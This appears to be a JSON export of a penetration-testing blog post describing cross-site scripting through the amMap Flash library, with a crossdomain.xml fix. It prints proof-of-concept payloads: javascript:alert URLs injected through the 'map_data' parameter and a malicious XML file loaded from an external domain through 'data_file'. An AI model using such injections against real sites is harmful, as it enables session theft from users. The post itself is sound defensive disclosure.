{"id":2831,"date":"2013-11-22T15:10:27","date_gmt":"2013-11-22T15:10:27","guid":{"rendered":"https:\/\/dn-www.azurewebsites.net\/2013\/11\/22\/cross-site-scripting-through-flash-objects\/"},"modified":"2025-07-29T15:10:14","modified_gmt":"2025-07-29T14:10:14","slug":"cross-site-scripting-through-flash-objects","status":"publish","type":"post","link":"https:\/\/dionach.com\/nl\/cross-site-scripting-through-flash-objects\/","title":{"rendered":"Cross-Site Scripting through Flash Objects"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-post\" data-elementor-id=\"2831\" class=\"elementor elementor-2831\" data-elementor-post-type=\"post\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-7535adca elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"7535adca\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-6436636d\" data-id=\"6436636d\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-2a219834 elementor-widget elementor-widget-text-editor\" data-id=\"2a219834\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Despite waning support for ActionScript on mobile platforms, the inclusion of ActionScript animations in web applications is common. Typically these animations are in the form of embedded SWF files, either through directly serving this content, or through an intermediate application which loads the SWF files from a protected area of the web server. The following scenario is based on a real-life, and commonly found, example of cross-site scripting through a hosted ActionScript animation identified during a recent penetration test. The amMap (available from <a href=\"http:\/\/www.ammap.com\" rel=\"nofollow\">http:\/\/www.ammap.com<\/a>), is a web-based HTML and JavaScript library which can be used to create interactive maps for websites and applications. Some older versions, and some common configuration errors when including amMap in websites, can lead to cross-site scripting vulnerabilities by using configuration files from external resources. In order to exploit these flaws, an attacker must first find the raw SWF file. This can be easily identified by searching in the source code for the SWF file extension, or through inspecting web application requests and responses in a web proxy, such as Fiddler or Burp. In this case, the raw file was available at the following URL:<\/p>\r\n\r\n<pre>https:\/\/&lt;<website>&gt;;\/maps\/ammap\/ammap.swf <\/website><\/pre>\r\n\r\nThe amMap library includes a number of customisable settings, but the ones which were of particular interest during the test are as follows:<\/p>\r\n\r\n<ul>\r\n\t<li><strong>data_file<\/strong>: this variable specifies the name of a data file to use as its source data. This can be a local file on the web server, or can be a remote file, hosted elsewhere.<\/li>\r\n\t<li><strong>map_data<\/strong>: this variable can be used to directly specify map data as part of the embedding HTML, through the amMap URL, rather than using a local or remotely hosted XML data file.<\/li>\r\n<\/ul>\r\n\r\n<p>It was possible to modify the &#8220;map_data&#8221; variable, specifying some simple, proof of concept HTML and JavaScript, rather than the actual data intended by the website owners. Please note that this script will only be executed if a user clicks on the country (Algeria) highlighted in the map.<\/p>\r\n\r\n<pre>https:\/\/&lt;<website>&gt;\/maps\/ammap\/ammap.swf?map_data=<map map_file=\"maps\/world.swf\"><areas><area mc_name=\"DZ\" title=\"Click here\" url=\"javascript:alert('XSS')\" \/><\/areas><\/map> <\/website><\/pre>\r\n\r\nThe following image shows that the injected HTML and JavaScript are invisible to the user:<\/p>\r\n\r\n<p><img decoding=\"async\" src=\"\/wp-content\/uploads\/files\/XSS1.jpg\" style=\"width: 500px; height: 250px;\" \/><\/p>\r\n\r\n<p>If a user of the application clicks on Algeria, which is highlighted in the previous image, the script will execute, causing a proof of concept alert to be displayed. Please note that real-life exploitation of cross-site scripting tends to be far more subtle than this.<\/p>\r\n\r\n<p><img decoding=\"async\" src=\"\/wp-content\/uploads\/files\/XSS3.jpg\" style=\"width: 500px; height: 250px;\" \/><\/p>\r\n\r\n<p>It is also possible to specify a crafted custom XML file through the variable &#8220;data_file&#8221;. An example malicious XML data file, malicious_ammap.xml, which causes a script to run for any country of the attacker&#8217;s choosing is shown below.\r\n\r\n<pre> [\u2026] <area color=\"\" mc_name=\"AL\" title=\"ALBANIA\" url=\"javascript:alert('XSS')\" value=\"\" zoom=\"2237.1429%\" zoom_x=\"-1124.1%\" zoom_y=\"-1109.6%\" \/> <area color=\"\" mc_name=\"AM\" title=\"ARMENIA\" url=\"javascript:alert('XSS')\" value=\"\" zoom=\"1271.96%\" zoom_x=\"-706.1%\" zoom_y=\"-596.6%\" \/> [\u2026] <\/pre>\r\n\r\nThis can then be specified with a direct call to the mapping library, or through an embedded HTML code block, by using a URL such as that shown below.<\/p>\r\n\r\n<pre>https:\/\/&lt;&lt;WebSite&gt;&gt;\/ammap.swf?\r\n\r\ndata_file:https:\/\/&lt;&lt;ExternalDomain&gt;&gt;\/malicious_ammap.xml<\/pre>\r\n\r\n<p><img decoding=\"async\" src=\"\/wp-content\/uploads\/files\/XSS2.jpg\" style=\"width: 500px; height: 250px;\" \/><\/p>\r\n\r\n<p>As before, the script will be executed when a user clicks on an affected country. The examples listed above are a mere proof of concept to show that the website can be vulnerable to cross-site scripting flaws. A cross-site scripting attack works by manipulating content of a web application and trick someone else into opening that page. Basically the potential damage of this attack may impact user&#8217;s browser. For example an attacker would have to build a malicious link and place it in malicious websites, web forums or send it by email. Despite the fact that an attacker can steal user&#8217;s sessions and so gain access personal details or administrative functionality, organization reputations can also be affected by this attack if a client has personal information exposed as a result of this issue. In order to tackle this issue we need to keep in mind what kind of software we are dealing with. Whereas it is not possible to manage the source code due to license restrictions, as it happens in this case, we need to work around with other alternatives. As a best practice for this scenario I would recommend setting up a cross-domain security policy restrictions on the server. A cross-domain policy is an XML file that must be named crossdomain.xml. This policy should reside at the root directory, as shown below. With a view of restricting access to files originating from external domains, we need to include the required domain name into the &#8220;&lt;allow-access-from&gt;&#8221; tag. This will prevent any attempt to load raw data from any external domain other than the one specify in the crossdomain.xml file.<\/p>\r\n\r\n\r\n<pre>https:\/\/&lt;&lt;WebSite&gt;&gt;\/crossdomain.xml <!--? xml version=\"1.0\"--> <cross-domain-policy> <allow-access-from domain=\"&lt;&lt;WebSite&gt;&gt;\"> <\/allow-access-from><\/cross-domain-policy> <\/pre>\r\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>Despite waning support for ActionScript on mobile platforms, the inclusion of ActionScript animations in web applications is common. Typically these animations are in the form of embedded SWF files, either through directly serving this content, or through an intermediate application which loads the SWF files from a protected area of the web server. The following [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"content-type":"","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[1],"tags":[207],"class_list":["post-2831","post","type-post","status-publish","format-standard","hentry","category-researchblog","tag-web_applications","wpbf-post"],"contentshake_article_id":"","yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.2 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Cross-Site Scripting through Flash Objects<\/title>\n<meta name=\"description\" content=\"Learn how Flash objects can be exploited for cross-site scripting (XSS) and why outdated technologies pose ongoing risks to web application security.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/dionach.com\/nl\/cross-site-scripting-through-flash-objects\/\" \/>\n<meta property=\"og:locale\" content=\"nl_NL\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Cross-Site Scripting through Flash Objects\" \/>\n<meta property=\"og:description\" content=\"Learn how Flash objects can be exploited for cross-site scripting (XSS) and why outdated technologies pose ongoing risks to web application security.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/dionach.com\/nl\/cross-site-scripting-through-flash-objects\/\" \/>\n<meta property=\"og:site_name\" content=\"Dionach\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/dionachcyber\" \/>\n<meta property=\"article:published_time\" content=\"2013-11-22T15:10:27+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-07-29T14:10:14+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/i0.wp.com\/dionach.com\/wp-content\/uploads\/2025\/02\/cropped-Dionach-vertical-col-yel-nomios-black-1.jpg?fit=512%2C512&ssl=1\" \/>\n\t<meta property=\"og:image:width\" content=\"512\" \/>\n\t<meta property=\"og:image:height\" content=\"512\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Dionach Admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@dionachcyber\" \/>\n<meta name=\"twitter:site\" content=\"@dionachcyber\" \/>\n<meta name=\"twitter:label1\" content=\"Geschreven door\" \/>\n\t<meta name=\"twitter:data1\" content=\"Dionach Admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Geschatte leestijd\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minuten\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/dionach.com\/nl\/cross-site-scripting-through-flash-objects\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/dionach.com\/nl\/cross-site-scripting-through-flash-objects\/\"},\"author\":{\"name\":\"Dionach Admin\",\"@id\":\"https:\/\/dionach.com\/nl\/#\/schema\/person\/e73f3537233924cf4944f7807068b3c8\"},\"headline\":\"Cross-Site Scripting through Flash Objects\",\"datePublished\":\"2013-11-22T15:10:27+00:00\",\"dateModified\":\"2025-07-29T14:10:14+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/dionach.com\/nl\/cross-site-scripting-through-flash-objects\/\"},\"wordCount\":743,\"publisher\":{\"@id\":\"https:\/\/dionach.com\/nl\/#organization\"},\"keywords\":[\"web applications\"],\"articleSection\":[\"researchblog\"],\"inLanguage\":\"nl-NL\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/dionach.com\/nl\/cross-site-scripting-through-flash-objects\/\",\"url\":\"https:\/\/dionach.com\/nl\/cross-site-scripting-through-flash-objects\/\",\"name\":\"Cross-Site Scripting through Flash Objects\",\"isPartOf\":{\"@id\":\"https:\/\/dionach.com\/nl\/#website\"},\"datePublished\":\"2013-11-22T15:10:27+00:00\",\"dateModified\":\"2025-07-29T14:10:14+00:00\",\"description\":\"Learn how Flash objects can be exploited for cross-site scripting (XSS) and why outdated technologies pose ongoing risks to web application security.\",\"breadcrumb\":{\"@id\":\"https:\/\/dionach.com\/nl\/cross-site-scripting-through-flash-objects\/#breadcrumb\"},\"inLanguage\":\"nl-NL\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/dionach.com\/nl\/cross-site-scripting-through-flash-objects\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/dionach.com\/nl\/cross-site-scripting-through-flash-objects\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/dionach.com\/nl\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Cross-Site Scripting through Flash Objects\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/dionach.com\/nl\/#website\",\"url\":\"https:\/\/dionach.com\/nl\/\",\"name\":\"Dionach\",\"description\":\"Real Security in a Virtual World\",\"publisher\":{\"@id\":\"https:\/\/dionach.com\/nl\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/dionach.com\/nl\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"nl-NL\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/dionach.com\/nl\/#organization\",\"name\":\"Dionach\",\"url\":\"https:\/\/dionach.com\/nl\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"nl-NL\",\"@id\":\"https:\/\/dionach.com\/nl\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.dionach.com\/wp-content\/uploads\/2025\/02\/cropped-Dionach-vertical-col-yel-nomios-black-1.jpg\",\"contentUrl\":\"https:\/\/www.dionach.com\/wp-content\/uploads\/2025\/02\/cropped-Dionach-vertical-col-yel-nomios-black-1.jpg\",\"width\":512,\"height\":512,\"caption\":\"Dionach\"},\"image\":{\"@id\":\"https:\/\/dionach.com\/nl\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/dionachcyber\",\"https:\/\/x.com\/dionachcyber\",\"https:\/\/uk.linkedin.com\/company\/dionach-ltd\",\"https:\/\/www.instagram.com\/dionachcyber\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/dionach.com\/nl\/#\/schema\/person\/e73f3537233924cf4944f7807068b3c8\",\"name\":\"Dionach Admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"nl-NL\",\"@id\":\"https:\/\/secure.gravatar.com\/avatar\/3061726a64a760303f6ea8f0976d3e8e0a6997b4da543be9a650b81584b4e79e?s=96&d=mm&r=g\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/3061726a64a760303f6ea8f0976d3e8e0a6997b4da543be9a650b81584b4e79e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/3061726a64a760303f6ea8f0976d3e8e0a6997b4da543be9a650b81584b4e79e?s=96&d=mm&r=g\",\"caption\":\"Dionach Admin\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Cross-Site Scripting through Flash Objects","description":"Learn how Flash objects can be exploited for cross-site scripting (XSS) and why outdated technologies pose ongoing risks to web application security.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/dionach.com\/nl\/cross-site-scripting-through-flash-objects\/","og_locale":"nl_NL","og_type":"article","og_title":"Cross-Site Scripting through Flash Objects","og_description":"Learn how Flash objects can be exploited for cross-site scripting (XSS) and why outdated technologies pose ongoing risks to web application security.","og_url":"https:\/\/dionach.com\/nl\/cross-site-scripting-through-flash-objects\/","og_site_name":"Dionach","article_publisher":"https:\/\/www.facebook.com\/dionachcyber","article_published_time":"2013-11-22T15:10:27+00:00","article_modified_time":"2025-07-29T14:10:14+00:00","og_image":[{"width":512,"height":512,"url":"https:\/\/i0.wp.com\/dionach.com\/wp-content\/uploads\/2025\/02\/cropped-Dionach-vertical-col-yel-nomios-black-1.jpg?fit=512%2C512&ssl=1","type":"image\/jpeg"}],"author":"Dionach Admin","twitter_card":"summary_large_image","twitter_creator":"@dionachcyber","twitter_site":"@dionachcyber","twitter_misc":{"Geschreven door":"Dionach Admin","Geschatte leestijd":"4 minuten"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/dionach.com\/nl\/cross-site-scripting-through-flash-objects\/#article","isPartOf":{"@id":"https:\/\/dionach.com\/nl\/cross-site-scripting-through-flash-objects\/"},"author":{"name":"Dionach Admin","@id":"https:\/\/dionach.com\/nl\/#\/schema\/person\/e73f3537233924cf4944f7807068b3c8"},"headline":"Cross-Site Scripting through Flash Objects","datePublished":"2013-11-22T15:10:27+00:00","dateModified":"2025-07-29T14:10:14+00:00","mainEntityOfPage":{"@id":"https:\/\/dionach.com\/nl\/cross-site-scripting-through-flash-objects\/"},"wordCount":743,"publisher":{"@id":"https:\/\/dionach.com\/nl\/#organization"},"keywords":["web applications"],"articleSection":["researchblog"],"inLanguage":"nl-NL"},{"@type":"WebPage","@id":"https:\/\/dionach.com\/nl\/cross-site-scripting-through-flash-objects\/","url":"https:\/\/dionach.com\/nl\/cross-site-scripting-through-flash-objects\/","name":"Cross-Site Scripting through Flash Objects","isPartOf":{"@id":"https:\/\/dionach.com\/nl\/#website"},"datePublished":"2013-11-22T15:10:27+00:00","dateModified":"2025-07-29T14:10:14+00:00","description":"Learn how Flash objects can be exploited for cross-site scripting (XSS) and why outdated technologies pose ongoing risks to web application security.","breadcrumb":{"@id":"https:\/\/dionach.com\/nl\/cross-site-scripting-through-flash-objects\/#breadcrumb"},"inLanguage":"nl-NL","potentialAction":[{"@type":"ReadAction","target":["https:\/\/dionach.com\/nl\/cross-site-scripting-through-flash-objects\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/dionach.com\/nl\/cross-site-scripting-through-flash-objects\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/dionach.com\/nl\/"},{"@type":"ListItem","position":2,"name":"Cross-Site Scripting through Flash Objects"}]},{"@type":"WebSite","@id":"https:\/\/dionach.com\/nl\/#website","url":"https:\/\/dionach.com\/nl\/","name":"Dionach","description":"Real Security in a Virtual World","publisher":{"@id":"https:\/\/dionach.com\/nl\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/dionach.com\/nl\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"nl-NL"},{"@type":"Organization","@id":"https:\/\/dionach.com\/nl\/#organization","name":"Dionach","url":"https:\/\/dionach.com\/nl\/","logo":{"@type":"ImageObject","inLanguage":"nl-NL","@id":"https:\/\/dionach.com\/nl\/#\/schema\/logo\/image\/","url":"https:\/\/www.dionach.com\/wp-content\/uploads\/2025\/02\/cropped-Dionach-vertical-col-yel-nomios-black-1.jpg","contentUrl":"https:\/\/www.dionach.com\/wp-content\/uploads\/2025\/02\/cropped-Dionach-vertical-col-yel-nomios-black-1.jpg","width":512,"height":512,"caption":"Dionach"},"image":{"@id":"https:\/\/dionach.com\/nl\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/dionachcyber","https:\/\/x.com\/dionachcyber","https:\/\/uk.linkedin.com\/company\/dionach-ltd","https:\/\/www.instagram.com\/dionachcyber\/"]},{"@type":"Person","@id":"https:\/\/dionach.com\/nl\/#\/schema\/person\/e73f3537233924cf4944f7807068b3c8","name":"Dionach Admin","image":{"@type":"ImageObject","inLanguage":"nl-NL","@id":"https:\/\/secure.gravatar.com\/avatar\/3061726a64a760303f6ea8f0976d3e8e0a6997b4da543be9a650b81584b4e79e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/3061726a64a760303f6ea8f0976d3e8e0a6997b4da543be9a650b81584b4e79e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/3061726a64a760303f6ea8f0976d3e8e0a6997b4da543be9a650b81584b4e79e?s=96&d=mm&r=g","caption":"Dionach Admin"}}]}},"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/ph4Ojq-JF","_links":{"self":[{"href":"https:\/\/dionach.com\/nl\/wp-json\/wp\/v2\/posts\/2831","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dionach.com\/nl\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dionach.com\/nl\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dionach.com\/nl\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dionach.com\/nl\/wp-json\/wp\/v2\/comments?post=2831"}],"version-history":[{"count":0,"href":"https:\/\/dionach.com\/nl\/wp-json\/wp\/v2\/posts\/2831\/revisions"}],"wp:attachment":[{"href":"https:\/\/dionach.com\/nl\/wp-json\/wp\/v2\/media?parent=2831"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dionach.com\/nl\/wp-json\/wp\/v2\/categories?post=2831"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dionach.com\/nl\/wp-json\/wp\/v2\/tags?post=2831"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}